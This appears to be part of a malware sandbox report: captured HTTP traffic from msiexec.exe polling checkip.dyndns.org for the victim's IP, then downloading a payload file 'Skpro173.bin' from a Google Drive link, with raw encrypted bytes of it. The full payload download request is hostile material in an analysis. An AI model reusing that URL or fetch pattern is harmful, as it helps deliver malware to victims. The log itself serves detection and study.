Oct 21, 2024 11:16:52.877963066 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d06ac4422c3e42b5d951bda59db5a98e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:16:53.914788961 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:16:54.164432049 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:54 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 36d523984707c6e83e7a8905128988bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:16:54.936021090 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:16:55.789262056 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:55 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1294afec4cb5c7a2f898c37b6e72b604 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:16:56.572761059 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:16:57.416898966 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2111a887e760dcbf4bc96d7f1305bb58 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:16:58.211410046 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:16:59.050570011 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:58 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 309bc27590fab07e0e325a0c867243b1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:16:59.861597061 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:17:00.695373058 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b5f61776d7b554f48e0fe3621614216b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:17:01.471379995 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:17:02.329632998 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:02 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8c731b3ac1058152e8516f3e0fe2f82b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:17:03.085829973 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:17:03.932949066 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b273e8b2fc474e513789a322e663731 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	193.122.6.168	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:17:04.704526901 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:17:05.548927069 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:05 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5f8bcf7e3392f3354fa488cf43b7f418 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	216.58.206.46	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:46 UTC	216	OUT	GET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-10-21 09:16:46 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 21 Oct 2024 09:16:46 GMT Location: https://drive.usercontent.google.com/download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce--Q9l_mbT8B-F3OdOqr1c3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	142.250.186.33	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:47 UTC	258	OUT	GET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-21 09:16:49 UTC	4885	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="Skpro173.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275520 Last-Modified: Sun, 20 Oct 2024 23:05:38 GMT X-GUploader-UploadID: AHmUCY09kYS8BiCI5m0esUWSlDoQ_d-qblMzsucKhECdae4Y9nWS9dlZoY_m4oid83FJ9gExlR4 Date: Mon, 21 Oct 2024 09:16:49 GMT Expires: Mon, 21 Oct 2024 09:16:49 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=dH5ogQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-21 09:16:49 UTC	4885	IN	Data Raw: 30 35 b3 07 44 f0 bd a3 13 2b c1 99 11 3c e6 4d ce 0f 9b da a2 58 b6 51 b1 8f b0 71 cd 0d 87 b6 e8 88 f1 54 50 86 cf 29 38 35 42 80 a3 01 25 71 3e f6 11 c1 64 f0 f0 38 ed 39 6b 1e 06 bf b1 58 c3 27 52 4d 85 1c bf 2f a1 25 2c 25 40 f2 c0 87 13 d4 55 f5 be 41 da 57 5c a0 8a 0e 9f fa 11 17 2e bf 39 0e c9 96 68 d7 2b e9 9c 31 89 99 47 e5 85 a9 ad ae 3c 3a 21 c9 11 40 51 95 c3 42 e8 5a 8b c0 43 e3 7a 12 95 1d 96 30 1f 73 67 5f 1e 40 2a eb 1c 9c 16 dc 7b b3 6f c5 65 22 79 6e b4 57 90 03 b7 32 18 5b 69 69 93 54 e7 0a 21 cb ed 65 01 67 35 0b 0c ec 61 46 be e7 ca 41 c9 00 da a4 b1 0e 8e 42 27 a0 9b 3a c2 19 77 58 4d 61 b0 13 34 d5 29 e4 32 5a 4f 24 05 7f 4f 8f 84 60 80 e0 a3 6a 23 91 0a 87 d9 d1 9c 5c fc 19 ac d7 1b 5b ce 5d 93 0c 05 30 3f b4 46 66 68 64 11 5f ea Data Ascii: 05D+<MXQqTP)85B%q>d89kX'RM/%,%@UAW\.9h+1G<:!@QBZCz0sg_@*{oe"ynW2[iiT!eg5aFAB':wXMa4)2ZO$O`j#\[]0?Ffhd_
2024-10-21 09:16:50 UTC	4885	IN	Data Raw: 76 88 fb 2f e4 d9 36 84 05 da e2 23 93 91 f7 2a db 72 bd e6 26 d9 fb 28 74 fe 72 7e bc 4b 2c e2 2b 67 32 98 1b 21 60 ca 37 36 d1 d5 50 41 db 18 4e 68 e7 76 4a 77 28 01 a5 49 90 92 38 3b 2f 64 0d 62 fd bc a3 f2 51 e1 18 25 ae ac 78 24 eb dc 2d 76 ce 24 e2 6f 07 a3 93 80 f6 98 da 3b 72 93 aa ec 18 b2 85 05 e3 93 d1 53 94 58 fd 21 fe 3a 96 ca 65 e7 cf e4 5c c5 00 b5 6f f4 9b e1 a1 cb f8 33 4f 0e 0d be 63 7e 79 bc 62 7e 6f 51 32 c9 b6 6d ae 76 ed de 1e 9d 4b e5 1b 18 a0 07 ae 13 0f 70 c8 b7 aa 1a a9 4d 3e 73 e5 b8 58 0a 5b c3 8d 57 84 d2 ab d7 f1 88 c2 0e 8a 9e 49 b0 e9 7d b0 57 b5 a9 0e 4f 32 db 0b 91 1f fa b6 e6 13 ac 15 e0 0f 1e e4 78 59 40 3b 6b 8b 08 f4 2b 96 fc a1 89 1b ed 02 81 9e c3 7c d7 6d a7 21 17 c0 84 f2 bf a5 06 35 f4 06 f7 e0 e0 79 f2 c3 ca ed Data Ascii: v/6#*r&(tr~K,+g2!`76PANhvJw(I8;/dbQ%x$-v$o;rSX!:e\o3Oc~yb~oQ2mvKpM>sX[WI}WO2xY@;k+\|m!5y
2024-10-21 09:16:50 UTC	40	IN	Data Raw: f5 db 29 33 9a d1 8f 2c 4e ef e9 44 b0 7c 61 0a 1a 30 b0 53 0e 75 5e 86 bb 47 64 1d 7b d1 b1 b3 a7 c5 49 6b 05 5e 1a 96 Data Ascii: )3,ND\|a0Su^Gd{Ik^
2024-10-21 09:16:50 UTC	1326	IN	Data Raw: eb a6 0f 03 e8 d2 67 29 50 64 02 ac d4 83 40 a6 b4 f0 1c ac 2b 5f e6 cf b4 ca 93 38 17 d3 d2 2d b0 b6 61 cf 71 9e 11 e9 1a 4d 85 8e 8b ec 61 b0 49 ce 81 d6 99 77 34 1b 74 e6 cc ed 6d 5d 99 62 da 12 90 cb 76 c1 70 eb a5 be c9 74 70 3c fc 01 31 be e1 3b 64 cc 69 72 01 55 5e bd d6 77 06 32 12 53 f6 0f 2d 8f 1e cb e8 f1 3e ce 22 f6 3d 43 90 3f 2a 8d bf cf 81 c6 81 ce e3 20 c1 80 d2 ea c0 88 5e 8f eb d1 d6 fd c2 49 a6 da db ba 9c 72 23 df ab 54 79 df 6d 32 e6 85 5a b2 04 8f 7c 6a 17 6d f5 10 12 8d fc 3c e3 14 f0 a2 5a 67 b2 60 b2 79 b1 4c 66 83 6d a9 8b 2d 60 8d df 66 89 df 34 c2 94 de 19 c8 4b 38 99 f7 6c 93 9c 17 d7 56 0e c9 a2 cd c1 67 81 23 65 68 19 ee b3 5a ef 5e 5f a4 51 ef c1 bb fe c6 5f 44 c5 fe b8 2e f3 f7 c1 c2 1d ba b9 40 85 94 13 50 26 3d 6d 5f b8 Data Ascii: g)Pd@+_8-aqMaIw4tm]bvptp<1;dirU^w2S->"=C?* ^Ir#Tym2Z\|jm<Zg`yLfm-`f4K8lVg#ehZ^_Q_D.@P&=m_
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: c0 4d 2d 50 cd 7b f3 54 cd c9 7a 62 ec c8 09 c3 8f 8c 40 22 77 a9 30 50 ba d7 93 ba 62 57 2a ec f1 25 2f bb 62 55 e5 d7 88 a9 b8 59 da 18 6e 63 c5 a4 9c 73 eb 0d 51 10 8a f8 b5 d0 0e 58 90 78 6d 6a 42 17 9f 08 fe 0e 3a 46 f1 fe fb 98 b7 11 b9 6e 54 d1 8f 76 b9 13 8f 54 de 75 ee c3 90 30 d7 d1 1e 44 80 7d 95 e6 dc 81 c1 03 11 50 ae 4e b0 9f 88 c2 d0 84 f6 cb 5a 5d 39 1f c8 2e 02 20 ae 58 a0 54 b1 8d 02 b5 0f 81 d3 fb 48 d0 9c d4 57 55 71 b0 0f 2b 02 1c 26 db 5a 32 89 3a 16 24 92 ef 1e 41 cb be a6 9b dd b1 13 c1 ac d2 79 09 be 73 43 98 84 71 eb 4e 59 f6 fd 51 6a 93 0c 24 dc 72 95 03 06 08 68 58 6b ed cb dd f9 ba 7c 5c ac 40 0d 1f a9 e4 eb ee ed d2 c3 7b ec 23 93 91 e4 de 3f 7d d3 fe dd 68 4d dd c5 ad 1c 36 00 8c cb 76 44 ab 9c 0a c5 9c db 61 cd f8 0d 57 7c Data Ascii: M-P{Tzb@"w0PbW*%/bUYncsQXxmjB:FnTvTu0D}PNZ]9. XTHWUq+&Z2:$AysCqNYQj$rhXk\|\@{#?}hM6vDaW\|
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: b2 e2 53 db 3d 7f af 28 97 fa ab 9e 0d bc 3a d9 3a 34 b4 55 f3 11 f3 e9 51 99 13 5d 6f 11 69 9e 28 16 d0 05 4f 9b 56 9e e2 0e 71 37 cd d9 6f b9 33 23 a7 17 c8 81 88 ae 50 2d 23 f1 12 9b 5a db 4d 6d 27 26 26 ba b2 c1 e5 32 a4 07 65 06 84 76 bc 63 bf 1a d9 ab d7 97 3a f9 67 e0 c0 8f bf c5 6d f8 16 a4 20 2a 1f 5e 74 81 38 58 d6 54 63 53 5f 70 13 dc 20 68 03 e4 36 81 f5 12 57 33 10 76 f1 24 37 a7 28 49 4c 34 a2 1f 10 7b 85 9b bd 4d f1 f7 7b de dc f0 4c 28 b8 f7 c2 d2 87 7d 9d cd df a1 5f c3 9e 5a 70 3b de 9e 0c cc ed 91 46 0c b2 61 d6 0d d4 79 51 63 27 9f 76 fb 86 87 1c bf 51 8e 25 2c 21 97 e6 c0 87 a1 c7 59 8b 88 41 da 53 6e 92 9b 0e ef ec 39 96 2e bf 33 18 37 97 7b da 3a e4 a5 e8 89 99 47 f3 ad df ad ae 36 3a 01 c9 1d 40 51 bd 34 42 e8 50 85 a1 d2 ed 7a a2 Data Ascii: S=(::4UQ]oi(OVq7o3#P-#ZMm'&&2evc:gm *^t8XTcS_p h6W3v$7(IL4{M{L(}_Zp;FayQc'vQ%,!YASn9.37{:G6:@Q4BPz
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: d4 66 4f 70 ad 3a c3 c5 11 0c 67 94 ec a5 c2 a6 4f 29 21 8a f1 7f 3e f1 b7 84 fb d1 e7 d3 83 94 dc 10 ff 58 bf e6 32 d7 a0 28 65 f2 76 5b ad 46 49 91 79 77 38 e8 d0 72 73 ef 1f 03 f4 c3 24 16 d4 18 62 22 e3 76 40 af 47 b8 8f 49 9a a1 5c 2e 2f 16 25 39 fd e6 a9 8c 1a d6 19 21 86 77 79 24 e1 ac 32 76 ce 20 ca 25 07 a1 99 22 e2 21 cf 13 c8 88 aa e6 6c f9 84 05 e2 91 d1 5b e6 c8 ed 21 8e 55 2d ca 65 ec cf ec 22 50 01 b5 6b 52 d9 e1 a1 df 8b 8f 4f 4b 07 d1 df 65 49 b5 62 e7 35 51 32 d0 ab e0 ff 76 ed f7 58 8b 39 f3 05 1f f8 ff 8b 04 2d c7 a7 eb a0 b8 86 3a 28 fd ea b2 28 af 61 ca 7e 30 84 d2 ae 1a b1 92 b0 b6 85 99 3e 7d aa 66 ce 41 b2 c6 6d 20 dc d1 64 f3 bd df a0 98 5b cb 7c 90 ad 3c 82 7c 59 5b 50 3f 9c 7b 94 26 9e ff 3c e5 71 93 b9 f2 f5 c9 7c dd 76 ce 8f Data Ascii: fOp:gO)!>X2(ev[FIyw8rs$b"v@GI\./%9!wy$2v %"!l[!U-e"PkROKeIb5Q2vX9-:((a~0>}fAm d[\|<\|Y[P?{&<q\|v
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: 4d 49 71 43 ce 9a cc 85 1f 34 1b 74 f5 d5 e7 0a f8 a3 62 d0 16 e3 30 b5 c1 7a 84 61 be df 56 06 2d f4 64 f4 9e e1 3d 1a f1 41 05 05 3a 92 bd ca f0 46 23 1a 20 49 09 5f 32 3d 7f 98 d9 75 bc 92 e0 9f 16 af 1a 6f 8d b5 a4 e4 e3 99 b6 0f 20 c9 ed 77 ea c0 88 59 08 d8 ba dc b4 c2 39 00 5d e9 88 5a 6a 31 d5 79 d3 44 b6 f8 b0 a6 f5 f8 96 38 e7 36 f0 07 69 27 97 2d e8 66 87 e3 64 58 25 64 01 ea f2 a7 7d 63 cb 5f e8 85 12 8b 5d c8 07 8f 7c fb a1 49 0a e4 7c 3b bd 35 04 93 55 40 95 55 17 dd 4f 03 b2 06 e9 c1 17 fb 4e 32 6a 1d b6 ec 72 6e 54 2d 66 55 11 b0 80 b6 d7 55 6e d8 f1 a0 2d b4 79 c1 c2 11 ba 64 ea 8f 94 02 7c 18 66 a7 5f b2 87 f6 a1 01 e6 ae 20 59 bc 41 7f 00 46 5a 58 b7 b9 86 22 43 fa b5 3d 9d 62 06 71 c7 4e f2 0e c3 7b 81 57 d1 b5 1c 93 33 8e ce d3 47 ae Data Ascii: MIqC4tb0zaV-d=A:F# I_2=uo wY9]Zj1yD86i'-fdX%d}c_]\|I\|;5U@UON2jrnT-fUUn-yd\|f_ YAFZX"C=bqN{W3G
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: be b4 4e 80 77 eb 07 d0 81 cc 3e 37 2b e3 5c b0 ef fc dd 0c 5a e1 c6 3b 69 39 15 d3 1f 78 60 86 3a a4 7c 85 50 61 b5 0f 5f c3 de 60 9a ae d4 5d 42 20 e7 25 49 72 0a 04 84 5a 32 83 2c 96 12 81 ea 0b 36 a5 76 a4 eb cb e7 bd c1 ac dc 1d c6 bd 60 17 9f 88 dc b7 53 de a0 03 50 78 b0 0b 50 91 4d 94 73 a4 2d 6b 8e d9 d0 cb d7 5d ec a4 2e 22 45 25 ae 0b c1 f8 90 a6 10 c3 7f 44 15 8e f2 51 af 05 0d 71 df b5 d5 67 dd cf c6 7a 13 1c f4 0b 68 43 b4 fb 22 b0 96 a5 56 de dd 77 79 ba 10 f1 22 72 a6 30 ce 4b 4a 52 99 8d ff d7 fb 40 6c c0 aa 5e 69 8c 1b f7 30 08 dd 61 71 a3 47 12 a4 35 05 89 91 e7 7e 47 bd fd 65 77 15 53 7d a2 4e 99 3e 60 fa 01 d7 30 8e 27 60 51 b1 99 58 1d 11 de 96 53 f6 6c eb c2 62 ed e0 dd 53 2e 2e 65 06 29 ef b3 35 a7 85 1f 7d ee 08 df 4a 14 a0 ae c6 Data Ascii: Nw>7+\Z;i9x`:\|Pa_`]B %IrZ2,6v`SPxPMs-k]."E%DQqgzhC"Vwy"r0KJR@l^i0aqG5~GewS}N>`0'`QXSlbS..e)5}J
2024-10-21 09:16:50 UTC	1378	IN	Data Raw: d5 70 ec ae 25 1b 50 ed a4 21 22 9d e8 63 57 f7 3a c4 ae 1b 61 03 85 9c b5 e8 03 b9 33 10 78 53 10 2d ba af 5f 4c 4e 00 1f 01 7b 85 97 d2 cf e1 d2 59 f9 fe eb cb 7b b2 f7 eb 95 91 0f cd 04 df d1 fd e6 f7 47 c4 3b da e6 f9 eb f5 93 de 2b 33 11 74 22 db f9 68 70 2c 8a df e7 57 f4 27 bc 2f d5 87 04 50 bf 0d ca 94 88 c2 7d 83 be 41 d0 57 3c a0 86 0e 9f d2 66 17 2e b5 39 0e b7 a9 68 d7 2f f8 be 43 f3 8e 47 95 fb b6 ad ae 38 12 68 c9 11 4a 40 b6 3d 02 e8 5a 81 f7 c7 ed 7a a0 9c 0e a7 ad 36 0b aa 7e 40 3b 67 98 14 8e 64 b3 16 1f 0e a8 45 41 66 37 da 38 e0 51 82 55 38 59 0a 2f 32 3d 89 20 73 7a bf 56 49 19 74 42 7e fc e1 0c 9a e7 cb 64 df 72 e6 b2 e1 3b 2c 67 7c 89 2c 3a 1b 96 45 1b 55 13 3e 1c 34 a5 8b c1 cb 24 75 25 0e 7a bd aa 9e 0c bf e3 a3 0e 81 b4 11 f9 f9 Data Ascii: 